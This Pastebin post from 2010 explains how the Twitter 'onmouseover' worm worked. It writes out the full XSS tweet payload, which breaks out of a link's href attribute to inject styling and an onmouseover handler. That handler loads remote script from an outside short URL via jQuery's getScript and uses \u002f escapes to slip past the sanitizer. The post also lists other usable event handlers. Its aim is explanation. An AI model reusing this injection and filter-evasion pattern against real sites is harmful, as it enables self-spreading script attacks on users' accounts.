SHARE
TWEET

@anusoft / twitter worm

a guest Sep 21st, 2010 1,141 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. How Twitter worm  "onmouseover" (and other ;) works.
  3. This bug should be called "input sanitization" not "XSS" and not "onmouseover bug"
  4.  
  5.  
  6. Usually twitter will sanitize user input like <html> tags so it won't change the page display or behavior.
  7.  
  8. When you tweet like in the twitter/ they will create the link (add <a href> tag for you)
  9.  
  10. But twitter forget to sanitize the link after @ symbol
  11.  
  12. This is when you tweet: http://www.google.com/ twitter will show like this:
  13. ################################################
  14. <a href="http://www.google.com/">
  15. http://www.google.com/
  16. </a>
  17. ################################################
  18.  
  19.  
  20.  
  21.  
  22. But when you tweet this:
  23. http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
  24.  
  25. twitter will show like this:
  26. ################################################
  27. <a href="http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/">
  28. http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"class/
  29. </a>
  30. ################################################
  31.  
  32. Then normal link can become a very dangerous link
  33.  
  34. Notice that you can add a lot of thing to do with this like, but I'll explain what this worm do.
  35.  
  36.  
  37. ************************************
  38. style="font-size:999999999999px;"
  39. ************************************
  40. This to enlarge the font so it cover large area, then user can easy move thier mouse over it
  41.  
  42. ************************************************************************
  43. onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"
  44. ************************************************************************
  45. This is tricky part, twitter.com uses jQuery JavaScript framework so life of hacker become much easiler
  46. jQuery Function .getscript() use to load external javascript from any source
  47.  
  48. and \u002f is / symbol this also tricky to avoid twitter sanitizer to clean it out
  49.  
  50. so the real link of script is:
  51. http://is.gd/fl9A7
  52.  
  53.  
  54. List of JavaScript trigger that works with <a> tag:
  55.  
  56. onfocus, onblur, onclick, ondblclick, onmousedown, onmouseup, onmouseover, onmousemove, onmouseout, onkeypress, onkeydown, onkeyup
  57.  
  58. Information about jQuery JavaScript Framework:
  59. jQuery http://docs.jquery.com/Main_Page
  60.  
  61.  
  62. - @anusoft
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top